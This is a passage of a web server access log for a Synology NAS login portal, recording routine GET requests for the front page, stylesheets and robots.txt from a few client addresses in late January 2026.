(KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[30/Jan/2026:14:02:08 +0000] - - 301 - GET http profibot.synology.me "/" [Client 116.202.146.229] [Length 166] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "-" +[30/Jan/2026:14:02:08 +0000] - 200 200 - GET https profibot.synology.me "/" [Client 116.202.146.229] [Length 2843] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "-" +[30/Jan/2026:14:02:08 +0000] - 200 200 - GET https profibot.synology.me "/webman/unsupported-browsers/dist/bundle.css?v=1661421011" [Client 116.202.146.229] [Length 590] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[30/Jan/2026:14:02:08 +0000] - 200 200 - GET https profibot.synology.me "/webman/modules/PollingTask/style.css?v=1661757678" [Client 116.202.146.229] [Length 609] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[30/Jan/2026:14:02:08 +0000] - 200 200 - GET https profibot.synology.me "/webman/modules/LogCenter/style.css?v=1657013615" [Client 116.202.146.229] [Length 2048] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[30/Jan/2026:14:02:08 +0000] - 200 200 - GET https profibot.synology.me "/webman/modules/SystemInfoApp/style.css?v=1661421011" [Client 116.202.146.229] [Length 2735] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[30/Jan/2026:14:02:08 +0000] - 200 200 - GET https profibot.synology.me "/webman/modules/PersonalSettings/style.css?v=1661757678" [Client 116.202.146.229] [Length 4474] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[30/Jan/2026:14:02:08 +0000] - 200 200 - GET https profibot.synology.me "/webman/modules/DiskMessageHandler/style.css?v=1661421011" [Client 116.202.146.229] [Length 575] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[30/Jan/2026:14:02:08 +0000] - - 499 - GET https profibot.synology.me "/webman/modules/DesktopProgress/style.css?v=1661757678" [Client 116.202.146.229] [Length 0] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[30/Jan/2026:14:02:08 +0000] - - 499 - GET https profibot.synology.me "/webman/modules/SecurityScan/style.css?v=1652943644" [Client 116.202.146.229] [Length 0] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[30/Jan/2026:14:02:08 +0000] - - 499 - GET https profibot.synology.me "/webman/modules/EnableNewUpdateSetting/style.css?v=1661421011" [Client 116.202.146.229] [Length 0] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[30/Jan/2026:14:02:08 +0000] - - 499 - GET https profibot.synology.me "/webman/modules/VideoPlayer2/style.css?v=1649656611" [Client 116.202.146.229] [Length 0] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[30/Jan/2026:14:02:08 +0000] - - 499 - GET https profibot.synology.me "/webman/modules/PkgManApp/style.css?v=1661757678" [Client 116.202.146.229] [Length 0] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[30/Jan/2026:14:02:08 +0000] - - 499 - GET https profibot.synology.me "/webman/modules/StorageManager/style.css?v=1661421011" [Client 116.202.146.229] [Length 0] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[30/Jan/2026:18:08:27 +0000] - 200 200 - GET https profibot.synology.me "/robots.txt" [Client 138.246.253.24] [Length 26] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36" "-" +[31/Jan/2026:12:24:56 +0000] - 200 200 - GET https profibot.synology.me "/" [Client 49.12.172.234] [Length 2850] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "-" +[31/Jan/2026:12:24:56 +0000] - 200 200 - GET https profibot.synology.me "/webman/unsupported-browsers/dist/bundle.css?v=1661421011" [Client 49.12.172.234] [Length 590] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[31/Jan/2026:12:24:56 +0000] - 200 200 - GET https profibot.synology.me "/scripts/ext-3.4/resources/css/ext-all.css?v=1650348555" [Client 49.12.172.234] [Length 12533] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[31/Jan/2026:12:24:56 +0000] - 200 200 - GET https profibot.synology.me "/scripts/ext-3/ux/ux-all.css?v=1650348555" [Client 49.12.172.234] [Length 25110] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[31/Jan/2026:12:24:56 +0000] - 200 200 - GET https profibot.synology.me "/webman/desktop/dist/style.css?v=1661421011" [Client 49.12.172.234] [Length 4183] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[31/Jan/2026:12:24:56 +0000] - 200 200 - GET https profibot.synology.me "/scripts/syno-vue-components/style/syno-vue-components.css?v=1652869476" [Client 49.12.172.234] [Length 26445] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[31/Jan/2026:12:24:56 +0000] - 200 200 - GET https profibot.synology.me "/scripts/scrollbar/flexcroll.css?v=1650348555" [Client 49.12.172.234] [Length 360] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[31/Jan/2026:12:24:56 +0000] - 200 200 - GET https profibot.synology.me "/synoSDSjslib/sds.css?v=1654081517" [Client 49.12.172.234] [Length 8242] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[31/Jan/2026:12:24:56 +0000] - 200 200 - GET https profibot.synology.me "/webman/taskbar/dist/style.css?v=1661421011" [Client 49.12.172.234] [Length 6059] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[31/Jan/2026:12:24:56 +0000] - 200 200 - GET https profibot.synology.me "/webman/login/dist/style.css?v=1661421011" [Client 49.12.172.234] [Length 6016] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[31/Jan/2026:12:24:56 +0000] - 200 200 - GET https profibot.synology.me "/webman/resources/css/desktop.css?v=1661421011" [Client 49.12.172.234] [Length 11272] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[31/Jan/2026:12:24:56 +0000] - 200 200 - GET https profibot.synology.me "/webman/modules/ExternalDevices/style.css?v=1661421011" [Client 49.12.172.234] [Length 1004] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[31/Jan/2026:12:24:56 +0000] - 200 200 - GET https profibot.synology.me "/webman/modules/SupportForm/style.css?v=1661757678" [Client 49.12.172.234] [Length 494] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[31/Jan/2026:12:24:56 +0000] - 200 200 - GET https profibot.synology.me "/webman/modules/ActiveInsightUpdateNotify/style.css?v=1661421011" [Client 49.12.172.234] [Length 0] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[31/Jan/2026:12:24:56 +0000] - 200 200 - GET https profibot.synology.me "/webman/modules/C3/style.css?v=1661421011" [Client 49.12.172.234] [Length 780] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[31/Jan/2026:12:24:56 +0000] - 200 200 - GET https profibot.synology.me "/webman/modules/DataDrivenDocuments/style.css?v=1661421011" [Client 49.12.172.234] [Length 0] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[31/Jan/2026:12:24:56 +0000] - 200 200 - GET https profibot.synology.me "/webman/modules/HotkeyManager/style.css?v=1661421011" [Client 49.12.172.234] [Length 1136] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[31/Jan/2026:12:24:56 +0000] - 200 200 - GET https profibot.synology.me "/webman/modules/PollingTask/style.css?v=1661757678" [Client 49.12.172.234] [Length 609] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[31/Jan/2026:12:24:56 +0000] - 200 200 - GET https profibot.synology.me "/webman/modules/LogCenter/style.css?v=1657013615" [Client 49.12.172.234] [Length 2048] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[31/Jan/2026:12:24:56 +0000] - 200 200 - GET https profibot.synology.me "/webman/modules/PersonalSettings/style.css?v=1661757678" [Client 49.12.172.234] [Length 4474] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[31/Jan/2026:12:24:56 +0000] - 200 200 - GET https profibot.synology.me "/webman/modules/DiskMessageHandler/style.css?v=1661421011" [Client 49.12.172.234] [Length 575] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[31/Jan/2026:12:24:56 +0000] - 200 200 - GET https profibot.synology.me "/webman/modules/SystemInfoApp/style.css?v=1661421011" [Client 49.12.172.234] [Length 2735] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[31/Jan/2026:12:24:56 +0000] - 200 200 - GET https profibot.synology.me "/webman/modules/SecurityScan/style.css?v=1652943644" [Client 49.12.172.234] [Length 4601] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[31/Jan/2026:12:24:56 +0000] - 200 200 - GET https profibot.synology.me "/webman/modules/VideoPlayer2/style.css?v=1649656611" [Client 49.12.172.234] [Length 1998] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[31/Jan/2026:12:24:56 +0000] - 200 200 - GET https profibot.synology.me "/webman/modules/StorageManager/style.css?v=1661421011" [Client 49.12.172.234] [Length 28078] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[31/Jan/2026:12:24:56 +0000] - 200 200 - GET https profibot.synology.me "/webman/modules/EnableNewUpdateSetting/style.css?v=1661421011" [Client 49.12.172.234] [Length 983] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[31/Jan/2026:12:24:56 +0000] - 200 200 - GET https profibot.synology.me "/webman/modules/DesktopProgress/style.css?v=1661757678" [Client 49.12.172.234] [Length 860] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[31/Jan/2026:12:24:56 +0000] - 200 200 - GET https profibot.synology.me "/webman/modules/SharingManager/style.css?v=1661757678" [Client 49.12.172.234] [Length 229] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[31/Jan/2026:12:24:56 +0000] - 200 200 - GET https profibot.synology.me "/webman/modules/PkgManApp/style.css?v=1661757678" [Client 49.12.172.234] [Length 5292] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[31/Jan/2026:12:24:56 +0000] - 200 200 - GET https profibot.synology.me "/webman/modules/ClipBoardJS/style.css?v=1661757678" [Client 49.12.172.234] [Length 387] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[31/Jan/2026:12:24:56 +0000] - 200 200 - GET https profibot.synology.me "/webman/modules/FileChooserV6/style.css?v=1661757678" [Client 49.12.172.234] [Length 1098] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[31/Jan/2026:12:24:56 +0000] - 200 200 - GET https profibot.synology.me "/webman/modules/PhotoViewer/style.css?v=1661757678" [Client 49.12.172.234] [Length 3361] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[31/Jan/2026:12:24:56 +0000] - 200 200 - GET https profibot.synology.me "/webman/modules/ResourceMonitor/style.css?v=1661421011" [Client 49.12.172.234] [Length 6761] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[31/Jan/2026:12:24:56 +0000] - 200 200 - GET https profibot.synology.me "/webman/modules/TaskSchedulerUtils/style.css?v=1661757678" [Client 49.12.172.234] [Length 104] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[31/Jan/2026:12:24:56 +0000] - 200 200 - GET https profibot.synology.me "/webman/modules/OTPWizard/style.css?v=1661757678" [Client 49.12.172.234] [Length 870] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[31/Jan/2026:12:24:56 +0000] - 200 200 - GET https profibot.synology.me "/webman/modules/MyDSCenter/style.css?v=1661757678" [Client 49.12.172.234] [Length 0] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[31/Jan/2026:12:24:56 +0000] - 200 200 - GET https profibot.synology.me "/webman/modules/UpdateMaskApp/style.css?v=1661421011" [Client 49.12.172.234] [Length 481] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[31/Jan/2026:12:24:56 +0000] - 200 200 - GET https profibot.synology.me "/webman/modules/Widgets/style.css?v=1661421011" [Client 49.12.172.234] [Length 3239] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[31/Jan/2026:12:24:56 +0000] - 200 200 - GET https profibot.synology.me "/webman/modules/AudioPlayer/style.css?v=1661757678" [Client 49.12.172.234] [Length 3921] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[31/Jan/2026:12:24:56 +0000] - 200 200 - GET https profibot.synology.me "/webman/modules/BackgroundTaskMonitor/style.css?v=1661757678" [Client 49.12.172.234] [Length 1934] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[31/Jan/2026:12:24:56 +0000] - 200 200 - GET https profibot.synology.me "/webman/modules/WelcomeApp/style.css?v=1661421011" [Client 49.12.172.234] [Length 10609] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[31/Jan/2026:12:24:56 +0000] - 200 200 - GET https profibot.synology.me "/webman/modules/AdminCenter/style.css?v=1661226912" [Client 49.12.172.234] [Length 15876] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[31/Jan/2026:12:24:56 +0000] - 200 200 - GET https profibot.synology.me "/webman/modules/HelpBrowser/style.css?v=1661757678" [Client 49.12.172.234] [Length 5614] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[31/Jan/2026:12:24:56 +0000] - 200 200 - GET https profibot.synology.me "/webman/modules/DSMNotify/style.css?v=1661757678" [Client 49.12.172.234] [Length 2159] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[31/Jan/2026:12:24:56 +0000] - 200 200 - GET https profibot.synology.me "/webman/modules/DisableAdminNotification/style.css?v=1661421011" [Client 49.12.172.234] [Length 440] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[31/Jan/2026:12:24:56 +0000] - 200 200 - GET https profibot.synology.me "/webman/modules/Utils/style.css?v=1661757678" [Client 49.12.172.234] [Length 2311] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[31/Jan/2026:12:24:56 +0000] - 200 200 - GET https profibot.synology.me "/webman/modules/TaskSchedulerWidget/style.css?v=1661421011" [Client 49.12.172.234] [Length 989] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[31/Jan/2026:12:24:56 +0000] - 200 200 - GET https profibot.synology.me "/webman/modules/ConfigBackup/style.css?v=1660704937" [Client 49.12.172.234] [Length 1239] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[31/Jan/2026:12:24:56 +0000] - 200 200 - GET https profibot.synology.me "/webman/modules/TinyMCE/style.css?v=1635321605" [Client 49.12.172.234] [Length 4624] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[31/Jan/2026:12:24:56 +0000] - 200 200 - GET https profibot.synology.me "/webman/modules/BandwidthControl/style.css?v=1634102886" [Client 49.12.172.234] [Length 72] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[31/Jan/2026:12:24:56 +0000] - 200 200 - GET https profibot.synology.me "/webman/modules/Share/style.css?v=1661757678" [Client 49.12.172.234] [Length 1433] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[31/Jan/2026:12:24:56 +0000] - 200 200 - GET https profibot.synology.me "/webman/modules/FileChooser/style.css?v=1661757678" [Client 49.12.172.234] [Length 943] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[31/Jan/2026:12:24:56 +0000] - 200 200 - GET https profibot.synology.me "/webman/modules/ResetAdminApp/style.css?v=1661421011" [Client 49.12.172.234] [Length 514] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[31/Jan/2026:12:24:56 +0000] - 200 200 - GET https profibot.synology.me "/webman/3rdparty/ScsiTarget/style.css?v=1659958512" [Client 49.12.172.234] [Length 7620] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[31/Jan/2026:12:24:56 +0000] - 200 200 - GET https profibot.synology.me "/webman/3rdparty/OAuthService/style.css?v=1618330426" [Client 49.12.172.234] [Length 345] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[31/Jan/2026:12:24:56 +0000] - 200 200 - GET https profibot.synology.me "/webman/3rdparty/CloudSync/style.css?v=1744186293" [Client 49.12.172.234] [Length 8535] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[31/Jan/2026:12:24:56 +0000] - 200 200 - GET https profibot.synology.me "/webman/3rdparty/FileBrowser/style.css?v=1657097204" [Client 49.12.172.234] [Length 12126] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[31/Jan/2026:12:24:56 +0000] - 200 200 - GET https profibot.synology.me "/webman/3rdparty/WebStation/style.css?v=1648710000" [Client 49.12.172.234] [Length 4262] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[31/Jan/2026:12:24:57 +0000] - 200 200 - GET https profibot.synology.me "/webman/3rdparty/SynologyPhotos/style.css?v=1733908506" [Client 49.12.172.234] [Length 56578] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[31/Jan/2026:12:24:57 +0000] - 200 200 - GET https profibot.synology.me "/webman/3rdparty/LogCenter/style.css?v=1657880510" [Client 49.12.172.234] [Length 580] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[31/Jan/2026:12:24:57 +0000] - 200 200 - GET https profibot.synology.me "/webman/3rdparty/CodecPack/style.css?v=1662540402" [Client 49.12.172.234] [Length 673] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[31/Jan/2026:12:24:57 +0000] - 200 200 - GET https profibot.synology.me 